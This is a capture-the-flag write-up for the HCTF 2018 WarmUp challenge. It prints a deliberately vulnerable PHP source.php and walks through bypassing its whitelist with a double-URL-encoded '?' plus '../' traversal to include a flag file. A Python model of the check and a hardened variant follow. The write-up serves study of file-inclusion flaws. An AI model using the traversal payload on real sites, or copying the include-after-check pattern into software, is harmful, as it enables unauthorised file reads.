[HCTF 2018]WarmUp

Open the home page: it shows a big grinning face. Pressing F12 (developer tools) reveals that a source.php exists.

Open source.php; the code is as follows:

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

That yields another page, hint.php, which says the flag is in ffffllllaaaagggg.

Continue auditing source.php:

if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}

This block tells us that to display the flag, three conditions must all hold:

1. The value is not empty.
2. The value is a string.
3. The value passes the check in checkFile().

Look at the checkFile() function:

highlight_file(__FILE__);
class emmm
{
    public static function checkFile(&$page)
    {
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
        if (! isset($page) || !is_string($page)) {
            echo "you can't see it";
            return false;
        }

        if (in_array($page, $whitelist)) {
            return true;
        }

        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}

There are four if statements:

1. The first requires $page to be set and to be a string.
2. The second requires $page itself to be in $whitelist (in_array() compares against the array's values, i.e. source.php and hint.php).
3. The third requires the part of $page before the first '?' to be in $whitelist.
4. The fourth requires that, after URL-decoding $page and again truncating at the first '?', the result is in $whitelist.

In the fourth if, URL decoding happens before the truncation, so we can URL-encode ? twice (? double-encoded is %253F): PHP decodes it once when parsing the request, and urldecode() decodes it a second time back to '?', so the fourth check still passes. Construct the URL:

http://e981d546-a52c-4358-8479-fa9bc1a48c03.node3.buuoj.cn/source.php?file=source.php%253fffffllllaaaagggg

Because we don't know where ffffllllaaaagggg is stored, keep adding ../ one level at a time until the flag is read. The final URL is:

http://e981d546-a52c-4358-8479-fa9bc1a48c03.node3.buuoj.cn/source.php?file=source.php%253f../../../../../ffffllllaaaagggg
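To see exactly why the fourth check accepts the payload above while `include` still receives the unmodified user string, here is an added Python model of checkFile() and of the request flow (this is not the challenge's own PHP; `unquote_plus` stands in for PHP's urldecode() and for the one-time decoding PHP applies to the query string, and `resolve_file_strict` is a hypothetical hardened replacement that maps the user-supplied key to a whitelisted filename instead of validating a transformed copy of the string):

```python
from typing import Optional, Tuple
from urllib.parse import unquote_plus

# Same whitelist as source.php: keys are short names, values are the real file names.
WHITELIST = {"source": "source.php", "hint": "hint.php"}


def before_question_mark(s: str) -> str:
    """Model of mb_substr($s, 0, mb_strpos($s . '?', '?')): everything before the first '?'."""
    return s.split("?", 1)[0]


def check_file(page) -> Tuple[bool, str]:
    """Model of emmm::checkFile(). Returns (verdict, which branch decided it)."""
    if not isinstance(page, str):
        return False, "not a string"
    values = list(WHITELIST.values())      # in_array() compares against values, not keys
    if page in values:
        return True, "exact match"
    if before_question_mark(page) in values:
        return True, "prefix before '?'"
    decoded = unquote_plus(page)           # PHP urldecode(): %XX decoded, '+' becomes a space
    if before_question_mark(decoded) in values:
        return True, "prefix before '?' after urldecode"
    return False, "rejected"


def simulate_request(raw_file_param: str) -> Tuple[bool, str, Optional[str]]:
    """PHP decodes the query string once before the script sees $_REQUEST['file'].

    Returns (passed, branch, string that `include` would receive or None).
    The security defect is visible here: the verdict is computed on a
    decoded and truncated copy, but the include operates on the original value.
    """
    file_value = unquote_plus(raw_file_param)
    ok, branch = check_file(file_value)
    return ok, branch, (file_value if ok else None)


def resolve_file_strict(key) -> Optional[str]:
    """Hardened variant (assumption, not the challenge code): treat the parameter as a
    whitelist key and return the mapped filename, so user input never reaches include."""
    if not isinstance(key, str):
        return None
    return WHITELIST.get(key)


if __name__ == "__main__":
    # Constructed inputs: the writeup's double-encoded parameter versus a plain traversal.
    for raw in ("source", "source.php", "source.php%253f../../../../../ffffllllaaaagggg",
                "../../../../../ffffllllaaaagggg"):
        print(raw, "->", simulate_request(raw), "| strict:", resolve_file_strict(raw))
```

Running it shows the double-encoded parameter passing only on the fourth branch while the string handed to `include` still contains `%3f` and the `../` segments; with the strict variant the same input resolves to nothing because only the keys `source` and `hint` are accepted.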
